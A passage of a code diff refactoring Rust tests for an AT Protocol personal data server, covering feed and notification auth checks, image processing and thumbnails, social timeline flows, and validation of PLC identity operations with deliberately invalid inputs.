.header("Authorization", format!("Bearer {}", jwt))
.send()
.await
.unwrap();
assert_eq!(res.status(), 400);
}
#[tokio::test]
async fn test_get_feed_requires_auth() {
let client = client();
let base = base_url().await;
let res = client
.get(format!(
"{}/xrpc/app.bsky.feed.getFeed?feed=at://did:plc:test/app.bsky.feed.generator/test",
base
))
.send()
.await
.unwrap();
assert_eq!(res.status(), 401);
}
#[tokio::test]
async fn test_get_feed_requires_feed_param() {
let client = client();
let base = base_url().await;
let (jwt, _did) = create_account_and_login(&client).await;
let res = client
.get(format!("{}/xrpc/app.bsky.feed.getFeed", base))
.header("Authorization", format!("Bearer {}", jwt))
.send()
.await
.unwrap();
assert_eq!(res.status(), 400);
}
#[tokio::test]
async fn test_register_push_requires_auth() {
let client = client();
let base = base_url().await;
let res = client
.post(format!("{}/xrpc/app.bsky.notification.registerPush", base))
.json(&json!({
"serviceDid": "did:web:example.com",
"token": "test-token",
"platform": "ios",
"appId": "xyz.bsky.app"
}))
.send()
.await
.unwrap();
assert_eq!(res.status(), 401);
}

View File

@@ -8,223 +8,154 @@ use std::io::Cursor;
fn create_test_png(width: u32, height: u32) -> Vec<u8> {
let img = DynamicImage::new_rgb8(width, height);
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png)
.unwrap();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
buf
}
fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> {
let img = DynamicImage::new_rgb8(width, height);
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg)
.unwrap();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap();
buf
}
fn create_test_gif(width: u32, height: u32) -> Vec<u8> {
let img = DynamicImage::new_rgb8(width, height);
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif)
.unwrap();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap();
buf
}
fn create_test_webp(width: u32, height: u32) -> Vec<u8> {
let img = DynamicImage::new_rgb8(width, height);
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP)
.unwrap();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap();
buf
}
#[test]
fn test_process_png() {
fn test_format_support() {
let processor = ImageProcessor::new();
let data = create_test_png(500, 500);
let result = processor.process(&data, "image/png").unwrap();
let png = create_test_png(500, 500);
let result = processor.process(&png, "image/png").unwrap();
assert_eq!(result.original.width, 500);
assert_eq!(result.original.height, 500);
}
#[test]
fn test_process_jpeg() {
let processor = ImageProcessor::new();
let data = create_test_jpeg(400, 300);
let result = processor.process(&data, "image/jpeg").unwrap();
let jpeg = create_test_jpeg(400, 300);
let result = processor.process(&jpeg, "image/jpeg").unwrap();
assert_eq!(result.original.width, 400);
assert_eq!(result.original.height, 300);
}
#[test]
fn test_process_gif() {
let processor = ImageProcessor::new();
let data = create_test_gif(200, 200);
let result = processor.process(&data, "image/gif").unwrap();
let gif = create_test_gif(200, 200);
let result = processor.process(&gif, "image/gif").unwrap();
assert_eq!(result.original.width, 200);
assert_eq!(result.original.height, 200);
}
#[test]
fn test_process_webp() {
let processor = ImageProcessor::new();
let data = create_test_webp(300, 200);
let result = processor.process(&data, "image/webp").unwrap();
let webp = create_test_webp(300, 200);
let result = processor.process(&webp, "image/webp").unwrap();
assert_eq!(result.original.width, 300);
assert_eq!(result.original.height, 200);
}
#[test]
fn test_thumbnail_feed_size() {
fn test_thumbnail_generation() {
let processor = ImageProcessor::new();
let data = create_test_png(800, 600);
let result = processor.process(&data, "image/png").unwrap();
let thumb = result
.thumbnail_feed
.expect("Should generate feed thumbnail for large image");
assert!(thumb.width <= THUMB_SIZE_FEED);
assert!(thumb.height <= THUMB_SIZE_FEED);
let small = create_test_png(100, 100);
let result = processor.process(&small, "image/png").unwrap();
assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail");
assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail");
let medium = create_test_png(500, 500);
let result = processor.process(&medium, "image/png").unwrap();
assert!(result.thumbnail_feed.is_some(), "Medium image should have feed thumbnail");
assert!(result.thumbnail_full.is_none(), "Medium image should NOT have full thumbnail");
let large = create_test_png(2000, 2000);
let result = processor.process(&large, "image/png").unwrap();
assert!(result.thumbnail_feed.is_some(), "Large image should have feed thumbnail");
assert!(result.thumbnail_full.is_some(), "Large image should have full thumbnail");
let thumb = result.thumbnail_feed.unwrap();
assert!(thumb.width <= THUMB_SIZE_FEED && thumb.height <= THUMB_SIZE_FEED);
let full = result.thumbnail_full.unwrap();
assert!(full.width <= THUMB_SIZE_FULL && full.height <= THUMB_SIZE_FULL);
let at_feed = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED);
let above_feed = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1);
assert!(processor.process(&at_feed, "image/png").unwrap().thumbnail_feed.is_none());
assert!(processor.process(&above_feed, "image/png").unwrap().thumbnail_feed.is_some());
let at_full = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL);
let above_full = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1);
assert!(processor.process(&at_full, "image/png").unwrap().thumbnail_full.is_none());
assert!(processor.process(&above_full, "image/png").unwrap().thumbnail_full.is_some());
let disabled = ImageProcessor::new().with_thumbnails(false);
let result = disabled.process(&large, "image/png").unwrap();
assert!(result.thumbnail_feed.is_none() && result.thumbnail_full.is_none());
}
#[test]
fn test_thumbnail_full_size() {
let processor = ImageProcessor::new();
let data = create_test_png(2000, 1500);
let result = processor.process(&data, "image/png").unwrap();
let thumb = result
.thumbnail_full
.expect("Should generate full thumbnail for large image");
assert!(thumb.width <= THUMB_SIZE_FULL);
assert!(thumb.height <= THUMB_SIZE_FULL);
fn test_output_format_conversion() {
let png = create_test_png(300, 300);
let jpeg = create_test_jpeg(300, 300);
let webp_proc = ImageProcessor::new().with_output_format(OutputFormat::WebP);
assert_eq!(webp_proc.process(&png, "image/png").unwrap().original.mime_type, "image/webp");
let jpeg_proc = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
assert_eq!(jpeg_proc.process(&png, "image/png").unwrap().original.mime_type, "image/jpeg");
let png_proc = ImageProcessor::new().with_output_format(OutputFormat::Png);
assert_eq!(png_proc.process(&jpeg, "image/jpeg").unwrap().original.mime_type, "image/png");
}
#[test]
fn test_no_thumbnail_small_image() {
let processor = ImageProcessor::new();
let data = create_test_png(100, 100);
let result = processor.process(&data, "image/png").unwrap();
assert!(
result.thumbnail_feed.is_none(),
"Small image should not get feed thumbnail"
);
assert!(
result.thumbnail_full.is_none(),
"Small image should not get full thumbnail"
);
}
#[test]
fn test_webp_conversion() {
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
let data = create_test_png(300, 300);
let result = processor.process(&data, "image/png").unwrap();
assert_eq!(result.original.mime_type, "image/webp");
}
#[test]
fn test_jpeg_output_format() {
let processor = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
let data = create_test_png(300, 300);
let result = processor.process(&data, "image/png").unwrap();
assert_eq!(result.original.mime_type, "image/jpeg");
}
#[test]
fn test_png_output_format() {
let processor = ImageProcessor::new().with_output_format(OutputFormat::Png);
let data = create_test_jpeg(300, 300);
let result = processor.process(&data, "image/jpeg").unwrap();
assert_eq!(result.original.mime_type, "image/png");
}
#[test]
fn test_max_dimension_enforced() {
let processor = ImageProcessor::new().with_max_dimension(1000);
let data = create_test_png(2000, 2000);
let result = processor.process(&data, "image/png");
assert!(matches!(result, Err(ImageError::TooLarge { .. })));
if let Err(ImageError::TooLarge {
width,
height,
max_dimension,
}) = result
{
assert_eq!(width, 2000);
assert_eq!(height, 2000);
assert_eq!(max_dimension, 1000);
}
}
#[test]
fn test_file_size_limit() {
let processor = ImageProcessor::new().with_max_file_size(100);
let data = create_test_png(500, 500);
let result = processor.process(&data, "image/png");
assert!(matches!(result, Err(ImageError::FileTooLarge { .. })));
if let Err(ImageError::FileTooLarge { size, max_size }) = result {
assert!(size > 100);
assert_eq!(max_size, 100);
}
}
#[test]
fn test_default_max_file_size() {
fn test_size_and_dimension_limits() {
assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024);
let max_dim = ImageProcessor::new().with_max_dimension(1000);
let large = create_test_png(2000, 2000);
let result = max_dim.process(&large, "image/png");
assert!(matches!(result, Err(ImageError::TooLarge { width: 2000, height: 2000, max_dimension: 1000 })));
let max_file = ImageProcessor::new().with_max_file_size(100);
let data = create_test_png(500, 500);
let result = max_file.process(&data, "image/png");
assert!(matches!(result, Err(ImageError::FileTooLarge { max_size: 100, .. })));
}
#[test]
fn test_unsupported_format_rejected() {
fn test_error_handling() {
let processor = ImageProcessor::new();
let data = b"this is not an image";
let result = processor.process(data, "application/octet-stream");
let result = processor.process(b"this is not an image", "application/octet-stream");
assert!(matches!(result, Err(ImageError::UnsupportedFormat(_))));
}
#[test]
fn test_corrupted_image_handling() {
let processor = ImageProcessor::new();
let data = b"\x89PNG\r\n\x1a\ncorrupted data here";
let result = processor.process(data, "image/png");
let result = processor.process(b"\x89PNG\r\n\x1a\ncorrupted data here", "image/png");
assert!(matches!(result, Err(ImageError::DecodeError(_))));
}
#[test]
fn test_aspect_ratio_preserved_landscape() {
fn test_aspect_ratio_preservation() {
let processor = ImageProcessor::new();
let data = create_test_png(1600, 800);
let result = processor.process(&data, "image/png").unwrap();
let thumb = result.thumbnail_full.expect("Should have thumbnail");
let landscape = create_test_png(1600, 800);
let result = processor.process(&landscape, "image/png").unwrap();
let thumb = result.thumbnail_full.unwrap();
let original_ratio = 1600.0 / 800.0;
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
assert!(
(original_ratio - thumb_ratio).abs() < 0.1,
"Aspect ratio should be preserved"
);
}
assert!((original_ratio - thumb_ratio).abs() < 0.1);
#[test]
fn test_aspect_ratio_preserved_portrait() {
let processor = ImageProcessor::new();
let data = create_test_png(800, 1600);
let result = processor.process(&data, "image/png").unwrap();
let thumb = result.thumbnail_full.expect("Should have thumbnail");
let portrait = create_test_png(800, 1600);
let result = processor.process(&portrait, "image/png").unwrap();
let thumb = result.thumbnail_full.unwrap();
let original_ratio = 800.0 / 1600.0;
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
assert!(
(original_ratio - thumb_ratio).abs() < 0.1,
"Aspect ratio should be preserved"
);
assert!((original_ratio - thumb_ratio).abs() < 0.1);
}
#[test]
fn test_mime_type_detection_auto() {
let processor = ImageProcessor::new();
let data = create_test_png(100, 100);
let result = processor.process(&data, "application/octet-stream");
assert!(result.is_ok(), "Should detect PNG format from data");
}
#[test]
fn test_is_supported_mime_type() {
fn test_utilities_and_builder() {
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
assert!(ImageProcessor::is_supported_mime_type("image/jpg"));
assert!(ImageProcessor::is_supported_mime_type("image/png"));
@@ -235,35 +166,16 @@ fn test_is_supported_mime_type() {
assert!(!ImageProcessor::is_supported_mime_type("image/bmp"));
assert!(!ImageProcessor::is_supported_mime_type("image/tiff"));
assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
assert!(!ImageProcessor::is_supported_mime_type("application/json"));
}
#[test]
fn test_strip_exif() {
let data = create_test_jpeg(100, 100);
let result = ImageProcessor::strip_exif(&data);
assert!(result.is_ok());
let stripped = result.unwrap();
let data = create_test_png(100, 100);
let processor = ImageProcessor::new();
let result = processor.process(&data, "application/octet-stream");
assert!(result.is_ok(), "Should detect PNG format from data");
let jpeg = create_test_jpeg(100, 100);
let stripped = ImageProcessor::strip_exif(&jpeg).unwrap();
assert!(!stripped.is_empty());
}
#[test]
fn test_with_thumbnails_disabled() {
let processor = ImageProcessor::new().with_thumbnails(false);
let data = create_test_png(2000, 2000);
let result = processor.process(&data, "image/png").unwrap();
assert!(
result.thumbnail_feed.is_none(),
"Thumbnails should be disabled"
);
assert!(
result.thumbnail_full.is_none(),
"Thumbnails should be disabled"
);
}
#[test]
fn test_builder_chaining() {
let processor = ImageProcessor::new()
.with_max_dimension(2048)
.with_max_file_size(5 * 1024 * 1024)
@@ -272,79 +184,6 @@ fn test_builder_chaining() {
let data = create_test_png(500, 500);
let result = processor.process(&data, "image/png").unwrap();
assert_eq!(result.original.mime_type, "image/jpeg");
}
#[test]
fn test_processed_image_fields() {
let processor = ImageProcessor::new();
let data = create_test_png(500, 500);
let result = processor.process(&data, "image/png").unwrap();
assert!(!result.original.data.is_empty());
assert!(!result.original.mime_type.is_empty());
assert!(result.original.width > 0);
assert!(result.original.height > 0);
}
#[test]
fn test_only_feed_thumbnail_for_medium_images() {
let processor = ImageProcessor::new();
let data = create_test_png(500, 500);
let result = processor.process(&data, "image/png").unwrap();
assert!(
result.thumbnail_feed.is_some(),
"Should have feed thumbnail"
);
assert!(
result.thumbnail_full.is_none(),
"Should NOT have full thumbnail for 500px image"
);
}
#[test]
fn test_both_thumbnails_for_large_images() {
let processor = ImageProcessor::new();
let data = create_test_png(2000, 2000);
let result = processor.process(&data, "image/png").unwrap();
assert!(
result.thumbnail_feed.is_some(),
"Should have feed thumbnail"
);
assert!(
result.thumbnail_full.is_some(),
"Should have full thumbnail for 2000px image"
);
}
#[test]
fn test_exact_threshold_boundary_feed() {
let processor = ImageProcessor::new();
let at_threshold = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED);
let result = processor.process(&at_threshold, "image/png").unwrap();
assert!(
result.thumbnail_feed.is_none(),
"Exact threshold should not generate thumbnail"
);
let above_threshold = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1);
let result = processor.process(&above_threshold, "image/png").unwrap();
assert!(
result.thumbnail_feed.is_some(),
"Above threshold should generate thumbnail"
);
}
#[test]
fn test_exact_threshold_boundary_full() {
let processor = ImageProcessor::new();
let at_threshold = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL);
let result = processor.process(&at_threshold, "image/png").unwrap();
assert!(
result.thumbnail_full.is_none(),
"Exact threshold should not generate thumbnail"
);
let above_threshold = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1);
let result = processor.process(&above_threshold, "image/png").unwrap();
assert!(
result.thumbnail_full.is_some(),
"Above threshold should generate thumbnail"
);
assert!(result.original.width > 0 && result.original.height > 0);
}

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

View File

@@ -4,114 +4,7 @@ use chrono::Utc;
use common::*;
use helpers::*;
use reqwest::StatusCode;
use serde_json::{Value, json};
use std::time::Duration;
#[tokio::test]
async fn test_social_flow_lifecycle() {
let client = client();
let (alice_did, alice_jwt) = setup_new_user("alice-social").await;
let (bob_did, bob_jwt) = setup_new_user("bob-social").await;
let (post1_uri, _) = create_post(&client, &alice_did, &alice_jwt, "Alice's first post!").await;
create_follow(&client, &bob_did, &bob_jwt, &alice_did).await;
tokio::time::sleep(Duration::from_secs(1)).await;
let timeline_res_1 = client
.get(format!(
"{}/xrpc/app.bsky.feed.getTimeline",
base_url().await
))
.bearer_auth(&bob_jwt)
.send()
.await
.expect("Failed to get timeline (1)");
assert_eq!(
timeline_res_1.status(),
reqwest::StatusCode::OK,
"Failed to get timeline (1)"
);
let timeline_body_1: Value = timeline_res_1.json().await.expect("Timeline (1) not JSON");
let feed_1 = timeline_body_1["feed"].as_array().unwrap();
assert_eq!(feed_1.len(), 1, "Timeline should have 1 post");
assert_eq!(
feed_1[0]["post"]["uri"], post1_uri,
"Post URI mismatch in timeline (1)"
);
let (post2_uri, _) = create_post(
&client,
&alice_did,
&alice_jwt,
"Alice's second post, so exciting!",
)
.await;
tokio::time::sleep(Duration::from_secs(1)).await;
let timeline_res_2 = client
.get(format!(
"{}/xrpc/app.bsky.feed.getTimeline",
base_url().await
))
.bearer_auth(&bob_jwt)
.send()
.await
.expect("Failed to get timeline (2)");
assert_eq!(
timeline_res_2.status(),
reqwest::StatusCode::OK,
"Failed to get timeline (2)"
);
let timeline_body_2: Value = timeline_res_2.json().await.expect("Timeline (2) not JSON");
let feed_2 = timeline_body_2["feed"].as_array().unwrap();
assert_eq!(feed_2.len(), 2, "Timeline should have 2 posts");
assert_eq!(
feed_2[0]["post"]["uri"], post2_uri,
"Post 2 should be first"
);
assert_eq!(
feed_2[1]["post"]["uri"], post1_uri,
"Post 1 should be second"
);
let delete_payload = json!({
"repo": alice_did,
"collection": "app.bsky.feed.post",
"rkey": post1_uri.split('/').last().unwrap()
});
let delete_res = client
.post(format!(
"{}/xrpc/com.atproto.repo.deleteRecord",
base_url().await
))
.bearer_auth(&alice_jwt)
.json(&delete_payload)
.send()
.await
.expect("Failed to send delete request");
assert_eq!(
delete_res.status(),
reqwest::StatusCode::OK,
"Failed to delete record"
);
tokio::time::sleep(Duration::from_secs(1)).await;
let timeline_res_3 = client
.get(format!(
"{}/xrpc/app.bsky.feed.getTimeline",
base_url().await
))
.bearer_auth(&bob_jwt)
.send()
.await
.expect("Failed to get timeline (3)");
assert_eq!(
timeline_res_3.status(),
reqwest::StatusCode::OK,
"Failed to get timeline (3)"
);
let timeline_body_3: Value = timeline_res_3.json().await.expect("Timeline (3) not JSON");
let feed_3 = timeline_body_3["feed"].as_array().unwrap();
assert_eq!(feed_3.len(), 1, "Timeline should have 1 post after delete");
assert_eq!(
feed_3[0]["post"]["uri"], post2_uri,
"Only post 2 should remain"
);
}
use serde_json::{json, Value};
#[tokio::test]
async fn test_like_lifecycle() {
@@ -277,97 +170,6 @@ async fn test_unfollow_lifecycle() {
);
}
#[tokio::test]
async fn test_timeline_after_unfollow() {
let client = client();
let (alice_did, alice_jwt) = setup_new_user("alice-tl-unfollow").await;
let (bob_did, bob_jwt) = setup_new_user("bob-tl-unfollow").await;
let (follow_uri, _) = create_follow(&client, &bob_did, &bob_jwt, &alice_did).await;
create_post(&client, &alice_did, &alice_jwt, "Post while following").await;
tokio::time::sleep(Duration::from_secs(1)).await;
let timeline_res = client
.get(format!(
"{}/xrpc/app.bsky.feed.getTimeline",
base_url().await
))
.bearer_auth(&bob_jwt)
.send()
.await
.expect("Failed to get timeline");
assert_eq!(timeline_res.status(), StatusCode::OK);
let timeline_body: Value = timeline_res.json().await.unwrap();
let feed = timeline_body["feed"].as_array().unwrap();
assert_eq!(feed.len(), 1, "Should see 1 post from Alice");
let follow_rkey = follow_uri.split('/').last().unwrap();
let unfollow_payload = json!({
"repo": bob_did,
"collection": "app.bsky.graph.follow",
"rkey": follow_rkey
});
client
.post(format!(
"{}/xrpc/com.atproto.repo.deleteRecord",
base_url().await
))
.bearer_auth(&bob_jwt)
.json(&unfollow_payload)
.send()
.await
.expect("Failed to unfollow");
tokio::time::sleep(Duration::from_secs(1)).await;
let timeline_after_res = client
.get(format!(
"{}/xrpc/app.bsky.feed.getTimeline",
base_url().await
))
.bearer_auth(&bob_jwt)
.send()
.await
.expect("Failed to get timeline after unfollow");
assert_eq!(timeline_after_res.status(), StatusCode::OK);
let timeline_after: Value = timeline_after_res.json().await.unwrap();
let feed_after = timeline_after["feed"].as_array().unwrap();
assert_eq!(feed_after.len(), 0, "Should see 0 posts after unfollowing");
}
#[tokio::test]
async fn test_mutual_follow_lifecycle() {
let client = client();
let (alice_did, alice_jwt) = setup_new_user("alice-mutual").await;
let (bob_did, bob_jwt) = setup_new_user("bob-mutual").await;
create_follow(&client, &alice_did, &alice_jwt, &bob_did).await;
create_follow(&client, &bob_did, &bob_jwt, &alice_did).await;
create_post(&client, &alice_did, &alice_jwt, "Alice's post for mutual").await;
create_post(&client, &bob_did, &bob_jwt, "Bob's post for mutual").await;
tokio::time::sleep(Duration::from_secs(1)).await;
let alice_timeline_res = client
.get(format!(
"{}/xrpc/app.bsky.feed.getTimeline",
base_url().await
))
.bearer_auth(&alice_jwt)
.send()
.await
.expect("Failed to get Alice's timeline");
assert_eq!(alice_timeline_res.status(), StatusCode::OK);
let alice_tl: Value = alice_timeline_res.json().await.unwrap();
let alice_feed = alice_tl["feed"].as_array().unwrap();
assert_eq!(alice_feed.len(), 1, "Alice should see Bob's 1 post");
let bob_timeline_res = client
.get(format!(
"{}/xrpc/app.bsky.feed.getTimeline",
base_url().await
))
.bearer_auth(&bob_jwt)
.send()
.await
.expect("Failed to get Bob's timeline");
assert_eq!(bob_timeline_res.status(), StatusCode::OK);
let bob_tl: Value = bob_timeline_res.json().await.unwrap();
let bob_feed = bob_tl["feed"].as_array().unwrap();
assert_eq!(bob_feed.len(), 1, "Bob should see Alice's 1 post");
}
#[tokio::test]
async fn test_account_to_post_full_lifecycle() {
let client = client();

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

View File

@@ -5,454 +5,127 @@ use serde_json::json;
use sqlx::PgPool;
#[tokio::test]
async fn test_request_plc_operation_signature_requires_auth() {
async fn test_plc_operation_auth() {
let client = client();
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
base_url().await
))
.send()
.await
.expect("Request failed");
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
.send().await.unwrap();
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
}
#[tokio::test]
async fn test_request_plc_operation_signature_success() {
let client = client();
let (token, _did) = create_account_and_login(&client).await;
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
base_url().await
))
.bearer_auth(&token)
.send()
.await
.expect("Request failed");
let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await))
.json(&json!({})).send().await.unwrap();
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
.json(&json!({ "operation": {} })).send().await.unwrap();
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
let (token, _) = create_account_and_login(&client).await;
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
.bearer_auth(&token).send().await.unwrap();
assert_eq!(res.status(), StatusCode::OK);
}
#[tokio::test]
async fn test_sign_plc_operation_requires_auth() {
async fn test_sign_plc_operation_validation() {
let client = client();
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.signPlcOperation",
base_url().await
))
.json(&json!({}))
.send()
.await
.expect("Request failed");
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
}
#[tokio::test]
async fn test_sign_plc_operation_requires_token() {
let client = client();
let (token, _did) = create_account_and_login(&client).await;
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.signPlcOperation",
base_url().await
))
.bearer_auth(&token)
.json(&json!({}))
.send()
.await
.expect("Request failed");
let (token, _) = create_account_and_login(&client).await;
let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await))
.bearer_auth(&token).json(&json!({})).send().await.unwrap();
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["error"], "InvalidRequest");
}
#[tokio::test]
async fn test_sign_plc_operation_invalid_token() {
let client = client();
let (token, _did) = create_account_and_login(&client).await;
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.signPlcOperation",
base_url().await
))
.bearer_auth(&token)
.json(&json!({
"token": "invalid-token-12345"
}))
.send()
.await
.expect("Request failed");
let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await))
.bearer_auth(&token).json(&json!({ "token": "invalid-token-12345" })).send().await.unwrap();
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: serde_json::Value = res.json().await.unwrap();
assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken");
}
#[tokio::test]
async fn test_submit_plc_operation_requires_auth() {
let client = client();
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.submitPlcOperation",
base_url().await
))
.json(&json!({
"operation": {}
}))
.send()
.await
.expect("Request failed");
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
}
#[tokio::test]
async fn test_submit_plc_operation_invalid_operation() {
let client = client();
let (token, _did) = create_account_and_login(&client).await;
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.submitPlcOperation",
base_url().await
))
.bearer_auth(&token)
.json(&json!({
"operation": {
"type": "invalid_type"
}
}))
.send()
.await
.expect("Request failed");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["error"], "InvalidRequest");
}
#[tokio::test]
async fn test_submit_plc_operation_missing_sig() {
let client = client();
let (token, _did) = create_account_and_login(&client).await;
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.submitPlcOperation",
base_url().await
))
.bearer_auth(&token)
.json(&json!({
"operation": {
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"prev": null
}
}))
.send()
.await
.expect("Request failed");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["error"], "InvalidRequest");
}
#[tokio::test]
async fn test_submit_plc_operation_wrong_service_endpoint() {
let client = client();
let (token, _did) = create_account_and_login(&client).await;
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.submitPlcOperation",
base_url().await
))
.bearer_auth(&token)
.json(&json!({
"operation": {
"type": "plc_operation",
"rotationKeys": ["did:key:z123"],
"verificationMethods": {"atproto": "did:key:z456"},
"alsoKnownAs": ["at://wrong.handle"],
"services": {
"atproto_pds": {
"type": "AtprotoPersonalDataServer",
"endpoint": "https://wrong.example.com"
}
},
"prev": null,
"sig": "fake_signature"
}
}))
.send()
.await
.expect("Request failed");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_request_plc_operation_creates_token_in_db() {
async fn test_submit_plc_operation_validation() {
let client = client();
let (token, did) = create_account_and_login(&client).await;
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
base_url().await
))
.bearer_auth(&token)
.send()
.await
.expect("Request failed");
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
.bearer_auth(&token).json(&json!({ "operation": { "type": "invalid_type" } })).send().await.unwrap();
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["error"], "InvalidRequest");
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
.bearer_auth(&token).json(&json!({
"operation": { "type": "plc_operation", "rotationKeys": [], "verificationMethods": {},
"alsoKnownAs": [], "services": {}, "prev": null }
})).send().await.unwrap();
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let handle = did.split(':').last().unwrap_or("user");
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
.bearer_auth(&token).json(&json!({
"operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"],
"verificationMethods": { "atproto": "did:key:z456" },
"alsoKnownAs": [format!("at://{}", handle)],
"services": { "atproto_pds": { "type": "AtprotoPersonalDataServer", "endpoint": "https://wrong.example.com" } },
"prev": null, "sig": "fake_signature" }
})).send().await.unwrap();
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
.bearer_auth(&token).json(&json!({
"operation": { "type": "plc_operation", "rotationKeys": ["did:key:zWrongRotationKey123"],
"verificationMethods": { "atproto": "did:key:zWrongVerificationKey456" },
"alsoKnownAs": [format!("at://{}", handle)],
"services": { "atproto_pds": { "type": "AtprotoPersonalDataServer", "endpoint": format!("https://{}", hostname) } },
"prev": null, "sig": "fake_signature" }
})).send().await.unwrap();
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["error"], "InvalidRequest");
assert!(body["message"].as_str().unwrap_or("").contains("signing key") || body["message"].as_str().unwrap_or("").contains("rotation"));
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
.bearer_auth(&token).json(&json!({
"operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"],
"verificationMethods": { "atproto": "did:key:z456" },
"alsoKnownAs": ["at://totally.wrong.handle"],
"services": { "atproto_pds": { "type": "AtprotoPersonalDataServer", "endpoint": format!("https://{}", hostname) } },
"prev": null, "sig": "fake_signature" }
})).send().await.unwrap();
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
.bearer_auth(&token).json(&json!({
"operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"],
"verificationMethods": { "atproto": "did:key:z456" },
"alsoKnownAs": ["at://user"],
"services": { "atproto_pds": { "type": "WrongServiceType", "endpoint": format!("https://{}", hostname) } },
"prev": null, "sig": "fake_signature" }
})).send().await.unwrap();
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_plc_token_lifecycle() {
let client = client();
let (token, did) = create_account_and_login(&client).await;
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
.bearer_auth(&token).send().await.unwrap();
assert_eq!(res.status(), StatusCode::OK);
let db_url = get_db_connection_string().await;
let pool = PgPool::connect(&db_url).await.expect("DB connect failed");
let pool = PgPool::connect(&db_url).await.unwrap();
let row = sqlx::query!(
r#"
SELECT t.token, t.expires_at
FROM plc_operation_tokens t
JOIN users u ON t.user_id = u.id
WHERE u.did = $1
"#,
